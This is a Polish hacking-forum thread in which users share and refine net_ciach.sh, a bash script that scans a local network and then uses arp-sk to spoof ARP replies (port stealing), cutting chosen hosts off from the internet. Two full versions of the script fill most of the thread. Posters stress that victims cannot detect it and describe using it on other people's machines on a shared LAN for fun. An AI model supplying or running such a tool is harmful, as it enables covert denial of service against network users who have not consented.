net_ciach

[Barca]

Proponuję nową zabawkę na weekend: net_ciach.sh

Wszak Polacy nie gęsi i swój NetCut mają ;-)

Skrypt wyłącza dostęp do internetu wybranym hostom w sieci lokalnej (max. dziesięciu naraz). Do działania wymaga:

arping - http://freshmeat.net/projects/arping/
arp-sk - http://www.arp-sk.org/

Na początku skrypt skanuje sieć w poszukiwaniu live hostów. Parametry skanowania ustawia się za pomocą zmiennych zdefiniowanych na początku skryptu. Program działa metodą "port stealing" tzn. mówiąc najogólniej oszukuje switcha wmawiając mu, że dany host jest wpięty do tego samego portu co nasz komputer. Dzięki temu pakiety przeznaczone dla niego, trafiają do nas, a my je upuszczamy dzięki wyłączeniu forwardingu (co jest już zresztą i tak domyślnie ustawione w systemie). Jest to więc jedynie half-duplex, ale to w pełni wystarcza by zerwać połączenie utrzymywane do tej pory przez naszą ofiarę.
Jaka jest główna zaleta tego działania?? Niewidoczność. Nawet najbardziej zaawansowany w obsłudze pakietów firewall Sygate'a nic nie sygnalizuje, zaś włączenie sniffera na kompie ofiary nie odkryje żadnego pakietu!! No, z wyj. ICMP redirect może, ale kto by się na tym poznał... Ponadto, dzięki temu że pakiety w adresie docelowym mają naszego kompa, są one widoczne TYLKO Z NASZEGO KOMPUTERA. Metoda ta nie dokonuje żadnych modyfikacji w cache'ach ofiar. Dodam, że mimo usilnych poszukiwań, nie znalazłem na Googlach drugiego programu, który w ten sposób odcinałby dostęp do Internetu.
Gdy chcemy zakończyc odcinanie, skrypt tak samo jak od razu odcinał neta, od razu go przywraca dzięki zapytaniu arp, skierowanym do ofiar (ofiary).
Skrypcik wysyła fałszywe ARP do każdego z komputerów co 10 sekund, ponieważ nie trzeba zalewać kompów ogromną ich liczbą - kolejna zaleta

Proszę oczywiście o informowanie o wszelkich bugach, w szczególności o ew. wykrywaniu naszej podstępnej działalności ;-) Zauważyłem że gdy pakiety były wysyłane zbyt często, win98 reagował komunikatem o konflikcie adresów MAC, ale wydaje mi się że ten problem został wyeliminowany właśnie przez duży delay między poszczególnymi pakietami.
Miłej zabawy.

#!/bin/sh
#
# net_ciach.sh
#
# Odcina okreslonemu hostowi (hostom - max. 10) dostep do internetu. Wyboru hosta
# dokonuje sie po przeskanowaniu zadanego fragmentu sieci.
# Do dzialania wymgaga arping oraz arp-sk.
#
# by Barca
#

BRAMA=192.168.0.1 # brama do internetu (adres routera/serwera)
ZAKRES=192.168.0. # rodzaj zakresu IP bez ostatniej pozycji, np. 192.168.0.
POCZATEK=100 # poczatkowy host do scanu w ramach podanego zakresu, np. 1
KONIEC=130 # koncowy host do scanu w ramach podanego zakresu, np. 255
CZAS=2000 # czas pingowania w ms - im dluzszy tym wieksze prawdopodobienstwo
# poprawnych wynikow ale rowniez dluzszy czas skanowania. Optimum: 2000
CYKL=10 # czas w sekundach jaki zajmuje skryptowi wyslanie po jednym pakiecie
# do kazdego hosta. Podzielony przez liczbe hostow daje czas jaki
# uplywa miedzy wyslaniem kazdego poszczegolnego pakietu. Optimum: 10

# skanowanie live hostow

MOJEIP=`/sbin/ifconfig eth0 | grep 'inet addr' | grep Bcast | awk '{print $2}' | awk -F: '{print $2}'`
MOJMAC=`/sbin/ifconfig eth0 | grep HWaddr | awk '{print $5; }'`

clear
echo $MOJMAC
echo -e "E[32m$MOJEIP033[0m"
hostname
echo
echo -e "033[4mPozostale live hosty w LANie:033[0m"
echo

KONIEC=`expr $KONIEC + 1`
while [ ! $POCZATEK = $KONIEC ]
do
IP=192.168.0.$POCZATEK
if [ $IP = $MOJEIP ]
then
POCZATEK=`expr $POCZATEK + 1`
IP=192.168.0.$POCZATEK
fi
arping -c 1 -r -w $CZAS $IP && echo -e "E[32m$IP033[0m" && nmblookup -A "$IP" | grep "<00>" | cut -f2 | awk -F" " '{print $1}' | head -n 1 && echo
POCZATEK=`expr $POCZATEK + 1`
done

echo 0 > /proc/sys/net/ipv4/ip_forward # wylacza forwarding pakietow

# pobieranie liczby hostow

echo -e "E[31mSkanowanie zakonczone033[0m"
echo ""
read -p "Ilu hostom chcesz odciac dostep do Internetu, max. 10 (q - wyjscie)? " LICZBA_OFIAR
if [ $LICZBA_OFIAR = q ]
then
exit
fi

X=0
echo ""

# pobieranie numerow IP

function numery_IP
{
if [ $X = $LICZBA_OFIAR ]
then
echo ""
else
X=`expr $X + 1`
echo -n "Podaj IP hosta nr "
echo -n $X
read -p ": " IP$X
numery_IP
fi
}

numery_IP

echo "Aby rozpoczac odcinanie tym hostom dostepu do internetu,"
read -p "nacisnij Enter (q - wyjscie) " X
if [ "$X" = "q" ]
then
exit
fi

function koniec
{
clear
echo -e "E[31mOdcinanie neta zakonczone033[0m"
echo "Pamietaj, ze Twoje ofiary nie beda mialy internetu jeszcze przez kilka minut."
echo ""
exit
}

# odlaczanie internetu

CZAS=`expr $CYKL / $LICZBA_OFIAR`

while Y=0
do

X=0

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP1 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP2 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP3 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP4 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP5 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP6 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP7 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP8 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP9 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

if [ "$X" -lt "$LICZBA_OFIAR" ]
then
echo ""
./arp-sk -c 1 -r -d $BRAMA -s $IP10 --rand-arp-hwa-src
X=`expr $X + 1`
read -p "q - koniec " -t $CZAS Z
if [ "$Z" = "q" ]
then
koniec
fi
fi

done

 

[krs*]

najs

 

[Barca]

najs by było gdyby nie jedna rzecz, która mi umknęła

Przeciwko win98 to działa pięknie. Teraz dopiero miałem okazję to stestować przeciwko 2k no i niestety ten badziew wywala komunikat o konflikcie IP - podejrzewam że w przypadku XP jest to samo. Muszę coś wymyśleć...

 

[Kobeer]

Taaa A jak bede wylanczal neta komus to administrator sie nieskapnie ??

 

[Barca]

Właśnie update'owałem ;-) kod skryptu. Przede wszystkim nie daje już komunikatu o konfliktu IP (przynajmniej na 2k, prosze o sprawdzenie tego przeciwko XP - 5 komputerów z 8 OSami nie mam

). Pod drugie, nie wymaga już arpdroppera - wystarczy arping oraz arp-sk.
Co do pytania SpaY-MaNa... No wszystko starałem się wyjaśnić w pierwszym poście. Mogę jeszcze dodać, że komenda arp -a niczego nie wykrywa 8) Jedyne co się dzieje to to, że router / serwer co kilka sekund ma inną informację o MAC adresie naszej ofiary oraz że się w sieci pojawia parę ICMP redirectów. Starałem się by działanie programu było maksymalnie niewykrywalne i uważam że zostało to osiagnięte w dużym stopniu.

 

[sc0rp10n]

Barca a tego nie mozna by zwinac jakos, bo ja sadze ze mozna.

Pozatym dobra robota ;]

 

[Barca]

Też sądziłem, że można, ale $IP$X mimo usilnych starań bash mi nie przyjmował i musiałem po kolei zrobić $IP1, $IP2 itd. :]

 

[sonne]

Originally posted by Barca
arping -c 1 -r -w $CZAS $IP && echo -e "E[32m$IP033[0m" && nmblookup -A "$IP" | grep "<00>" | cut -f2 | awk -F" " '{print $1}' | head -n 1 && echo
POCZATEK=`expr $POCZATEK + 1`
done

No i tu następuje "dęta", bo ja nie mam takiej opcji arpingu "-r":

# arping -c 1 -r -w 50 192.168.3.1

arping: invalid option -- r

W man arping też nie mam... :-(
Powiedz mi co to ma być za opcja ?
Nie wiem może nie ta wersja - mam arping-2.04, libnet_1.1.1. Albo mam coś nieskonfigurowane, chociaż jak w man nie ma...to dziwne.
Albo może coś źle myślę bo mam grypę i mnie all boli...
Pozdry

Ps: W ogóle bardzo fajny pomysł

Edit: Aha i mam arp-sk-0.0.15 - może tu jest problem ?

 

[Barca]

-r Raw output: only the MAC/IP address is displayed for each reply.

To jest z manuala arpinga. Ja mam arping 2.04, libnet 1.1.2.1 oraz arp-sk 0.0.15.
Arping służy tylko do zeskanowania hostow. Dla samego odcinania neta wazny jest jedynie arp-sk, tak wiec spokojnie mozesz pominac fragment skryptu az do "# pobieranie liczby hostow"

 

[sonne]

Originally posted by Barca
-r Raw output: only the MAC/IP address is displayed for each reply.
To jest z manuala arpinga. Ja mam arping 2.04, libnet 1.1.2.1 oraz arp-sk 0.0.15.

??? Mogę tu wkleić swój "man arping", ale to nie ma sensu - nie mam takiej opcji :-( Ale w ogóle to cały czas mi się wydawało, że coś nie tak z tym moim arpingiem, bo jak chce bezpośrednio pingować MAC to nici, a pisze "jak byk", że można...

Wie ktoś o co u mnie chodzi ???

Originally posted by Barca
Arping służy tylko do zeskanowania hostow. Dla samego odcinania neta wazny jest jedynie arp-sk, tak wiec spokojnie mozesz pominac fragment skryptu az do "# pobieranie liczby hostow"

No bez przesady najwyżej wywalę tą opcję "-r" - zaoszczędzę na uruchamianiu nmap'a lub innego
skanera =]
Dobra jutro się pobawię, bo dzisiaj już nie za bardzo jest co odcinać...

)

 

[Barca]

No akurat jeśli chodzi o pingowanie MACów to u mnie też to średnio wygląda. Jak pinguję bezpośrednio z shella to działa, ale jak to samo wlepię do skryptu to już pingować MACa nie chce

Życie jest pełne zagadek...
Jasne, ze możesz samo -r wywalić, ja to tylko dla estetyki dodałem

 

[sonne]

Ehhh ostatnio mam awarię sieci i nie mogę przysiąść, żeby coś sobie poodłączać bo non stop sami odłączają net :-D Trochę tam się poprzyglądałam xp-kom, ale jeszcze trza się bliżej przyjrzeć - w ogóle mam fajny LAN - dużo systemów.
Co do arpingu to spróbuję wywalić i zobaczę co tam przy instalacji będzie wypisywać np. przy ./configure ...

 

[sonne]

Ostatnio ze względu na to, że ta tanizna z której zbudowana jest moja sieć się totalnie posypała nie mam neta (z przerwami 10 minutowymi) :evil: . I tak w oczekiwaniu na poprawę sytuacji (wiara czyni cuda) usiadłam sobie wczoraj nad bash'em zachęcona powyższym skryptem Barcy.
Jak chodzi o skrypty wsadowe to trochę się tam bawiłam wcześniej w windzie batch'em (wiadomo w jakich głównie celach ;-) ) ale w bash'u żadnych doświadczeń nie posiadam.
Pierwsze wrażenia to odczuwalny brak takiej typowej pętli iteracyjnej w instrukcjach powtarzających typu "for i=1 to 2 do" oraz przede wszystkim instrukcji przejścia (skoku) typu "goto" itp. w porównaniu do bardziej rozbudowanych języków programowania. No ale jakoś trza to przeżyć ...
Pozwoliłam sobie trochę przerobić skrypt Barcy pod względem samego kodu i umieścic tu tę przeróbkę (jako, że dział newbie)

.
Główna innowacja to zminimalizowanie kodu poprzez wykonanie zadania odcinania neta w pętli a nie w poszczególnych krokach (sc0rp10n specjalnie na Twoje życzenie wyrażone parę postów wyżej ;P ;P), poza tym dodałam menu wyboru oraz zabezpieczenia tego typu, że wciśnięcie klawisza 0 przy podawaniu lby hostów powoduje wyjście z programu, a jakakolwiek cyfra spoza przyjętego zakresu 1-10 powoduje przyjęcie liczby max. hostów =10. Skanowania nie ruszałam ze względu na problemy z arpingiem. Nie pamiętam co tam jeszce ew. pozmieniałam ;P Dalsze modyfikacje nie są przewidywane ;P. Ponieważ to mój pierwszy krok w bashu wszelkie pozytywne odzewy mile widziane ;P.

#!/bin/sh

#

# net_ciach.sh

#

# Skanuje wybrany fragment sieci oraz odcina okreslonemu 

# hostowi (hostom - max. 10) dostep do internetu.

# Do dzialania wymgaga arping oraz arp-sk.

#

# by Barca modified by sonne;P

#



BRAMA=192.168.3.1 # brama do internetu (adres routera/serwera)

ZAKRES=192.168.3. # rodzaj zakresu IP bez ostatniej pozycji, np. 192.168.0.

POCZATEK=2 # poczatkowy host do scanu w ramach podanego zakresu, np. 1

KONIEC=254 # koncowy host do scanu w ramach podanego zakresu, np. 255

CZAS=1000 # czas pingowania w ms - im dluzszy tym wieksze prawdopodobienstwo

# poprawnych wynikow ale rowniez dluzszy czas skanowania. Optimum: 2000

CYKL=10 # czas w sekundach jaki zajmuje skryptowi wyslanie po jednym pakiecie

# do kazdego hosta. Podzielony przez liczbe hostow daje czas jaki

# uplywa miedzy wyslaniem kazdego poszczegolnego pakietu. Optimum: 10



#menu wyboru

while :

do

clear

echo

echo "--------------------------------------"

echo "*net_ciach by Barca modified by sonne*"

echo "--------------------------------------"

echo

echo "[1] Rozpocznij skanowanie"

echo "[2] Odetnij dostęp do netu"

echo "[q] Wyjście z programu"

echo

echo "======================================"

echo

echo -n "Wybierz opcję i naciśnij enter: "

read opcja



if [ $opcja = q ]

then

exit

fi



# skanowanie live hostow  

if [ $opcja = 1 ]

then



MOJEIP=`/sbin/ifconfig eth0 | grep 'inet addr' | grep Bcast | awk '{print $2}' | awk -F: '{print $2}'`

MOJMAC=`/sbin/ifconfig eth0 | grep HWaddr | awk '{print $5; }'`



clear

echo $MOJMAC

echo -e "E[32m$MOJEIP033[0m"

hostname

echo

echo -e "033[4mPozostale live hosty w LANie:033[0m"

echo



KONIEC=`expr $KONIEC + 1`

while [ ! $POCZATEK = $KONIEC ]

do

IP=192.168.3.$POCZATEK

if [ $IP = $MOJEIP ]

then

POCZATEK=`expr $POCZATEK + 1`

IP=192.168.3.$POCZATEK

fi

arping -c 1 -w $CZAS $IP && echo -e "E[32m$IP033[0m" && nmblookup -A "$IP" | grep "<00>" | cut -f2 | awk -F" " '{print $1}' | head -n 1 && echo

POCZATEK=`expr $POCZATEK + 1`

done



echo 0 > /proc/sys/net/ipv4/ip_forward # wylacza forwarding pakietow



echo -e "E[31mSkanowanie zakonczone033[0m"

opcja=2

fi



# pobieranie liczby hostów 

if [ $opcja = 2 ]

then 



echo ""

read -p "Ilu hostom chcesz odciac dostep do Internetu, max. 10 (q - wyjscie)? " LICZBA_OFIAR

if [ $LICZBA_OFIAR = q ]||[ $LICZBA_OFIAR = 0 ]

then

exit

fi



if [ $LICZBA_OFIAR -gt 10 ]

then LICZBA_OFIAR=10 && echo

echo "Podano za dużą liczbę hostów dlatego przyjęta została ilość max. - $LICZBA_OFIAR"

fi



# pobieranie numerow IP

X=0

echo ""



function numery_IP

{

if [ $X = $LICZBA_OFIAR ]

then

echo ""

else

X=`expr $X + 1`

echo -n "Podaj IP hosta nr "

echo -n $X

read -p ": " IP$X

numery_IP

fi

}

numery_IP



IP=($IP1 $IP2 $IP3 $IP4 $IP5 $IP6 $IP7 $IP8 $IP9 $IP10)



echo "Aby rozpoczac odcinanie tym hostom dostepu do internetu,"

read -p "nacisnij Enter (q - wyjscie) " X

if [ "$X" = "q" ]

then

exit

fi



function koniec

{

clear

echo -e "E[31mOdcinanie neta zakonczone033[0m"

echo "Pamietaj, ze Twoje ofiary nie beda mialy internetu jeszcze przez kilka minut."

echo ""

exit

}



# odlaczanie internetu

CZAS=`expr $CYKL / $LICZBA_OFIAR`

X=0



function odcinanie

{

while :

do

if [ "$X" -lt "$LICZBA_OFIAR" ]

then

echo ""

arp-sk -c 1 -r -d $BRAMA -s ${IP[$X]} --rand-arp-hwa-src

X=`expr $X + 1`

read -p "q - koniec " -t $CZAS Z

if [ "$Z" = "q" ]

then

koniec

fi

else X=0

fi

done

}

odcinanie 

fi



if [ $opcja != 1 ] || [ $opcja != 2 ] 

then 

echo "Nie wybrano żadnej opcji"

echo "Naciśnij dowolny klawisz. . ."; read

fi 



done

Zasada działania skryptu jest nadal oparta na programie arp-sk, więc się nie zmieniła. Barca ją już wyżej opisał, więc nie będę się powtarzała. Dodam tylko, że jest to bardzo dobrze widoczne podczas działania skryptu.
Zastosowana metoda jest bardzo fajna ze względu na jej praktyczną niewykrywalność i brak interakcji z firewallami (tak przynajmniej by wynikało z teorii).
Więcej o możliwościach wykorzystania tej metody przy włączonym z kolei forwardingu można sobie poczytać tutaj:
http://www.haker.com.pl/forum/viewtopic.ph...4bc4683f1bbaffc

Co do konkretniejszych wniosków to trudno je wyciągnąć bez internetu... Na razie wiem tylko tyle, że xp-ki są odłączane bez problemów ... z tym, że moje ofiary prawie natychmiast wyłączają kompa... szkoda, że nie mam bezpośredniej możliwości sprawdzenia tego - mam dwa kompy i parę dysków-systemów, ale tylko jedną kartę sieciową...

 

[Barca]

Cieszę się, że Cię sonne zainteresował skrypcik. Ja w bashu też dopiero pierwsze kroki stawiam, też zaczynałem od bat-ów no i tak samo mi doskwierał na początku brak pętli for

Dodam tylko że linijka wyłączająca forwarding jest zbędna bo i tak taką wartość jest przyjęta domyślnie a poza tym nawet i jego włączenie nic nie zmieni, neta nie będzie dalej. Skąd się więc wzięła?? Początkowo skrypt działał na innej zasadzie i była potrzebna, a potem zapomniałem ją wywalić

Skorzystam sonne z Twoich pomysłów, zwłaszcza na skrócenie skryptu, no i czekam na Twoje pomysły na chaxiorskie zabawki ;-)

PS Namieszałaś trochę z arp-sk, bo wywala masę komunikatów jak nie znajduje hostów

 

[sonne]

Originally posted by Barca+--><div class='quotetop'>CYTAT(Barca)</div>

Dodam tylko że linijka wyłączająca forwarding jest zbędna bo i tak taką wartość jest przyjęta domyślnie a poza tym nawet i jego włączenie nic nie zmieni, neta nie będzie dalej.[/b]

Wiem, że w systemie jest domyślnie wyłączony, ale zostawiłam na wszelki wypadek. Z włączonym nie próbowałam ... przeanalizuję sobie.
<!--QuoteBegin-Barca
PS Namieszałaś trochę z arp-sk, bo wywala masę komunikatów jak nie znajduje hostów

Nic nie zmieniałam jak widać:
u Ciebie: ./arp-sk -c 1 -r -d $BRAMA -s $IP5 --rand-arp-hwa-src
u mnie: arp-sk -c 1 -r -d $BRAMA -s ${IP[$X]} --rand-arp-hwa-src
jedyna różnica w sposobie uruchamiania: "./"
Więc coś Ci się musiało pokręcić. Mi żadnych zbędnych komunikatów nie wywala, a sprawdzałam dosyc dokładnie...

Originally posted by Barca
też zaczynałem od bat-ów

Jak chodzi w ogóle o języki programowania to zaczynałam od turbo pascala trochę już lat temu...

 

[Barca]

Chodziło mi o to, że zmienilaś składnię arpinga a nie arp-sk (brak "-r") co u mnie owocuje tym, że gdy dane IP arpingowi nie odpowiedziało, on wywala o tym komunikat i tym sposobem mam 200 linijek tekstu w konsoli

Nie dzieje się tak u Ciebie??

 

[sonne]

Originally posted by Barca
Chodziło mi o to, że zmienilaś składnię arpinga a nie arp-sk (brak "-r") co u mnie owocuje tym, że gdy dane IP arpingowi nie odpowiedziało, on wywala o tym komunikat i tym sposobem mam 200 linijek tekstu w konsoli

Nie dzieje się tak u Ciebie??

He,he Ty mnie chyba celowo stresujesz tym arpingiem

Pisałam ileś dni temu:

Originally posted by sonne
No i tu następuje "dęta", bo ja nie mam takiej opcji arpingu "-r":

# arping -c 1 -r -w 50 192.168.3.1

arping: invalid option -- r

W man arping też nie mam...

Na co Ty odpisałeś:

Originally posted by Barca
-r Raw output: only the MAC/IP address is displayed for each reply.
To jest z manuala arpinga.

No i kurcze nadal nie mam "-r" ani w arpingu ani w "man arping". Co ciekawe nie wywala mi żadnego syfu przy działaniu programu a już 200 linijek to :shock: ... Ciekawe bo wygląda na to, że mamy inne arpingi a niby mamy tę samą wersję 2.04... :?:

Tutaj jest strona "Manpage of ARPING"
http://www.netadmintools.com/html/arping.man.html#lbAG
i też nie ma opcji "-r" (?)
Ty mnie w balona coś robisz przyznaj się

 

[Barca]

Hehehehe, no jakżebym mógł

Ja mam tego: http://freshmeat.net/redir/arping/385/url_...ing-2.04.tar.gz z oficjalnej strony. No i głowę daję że mam opcję -r

No mniejsza z tym, po to pisze się skrypty żeby działało na kompie na którym się pisze w końcu, a script-kiddies niech się martwią 8)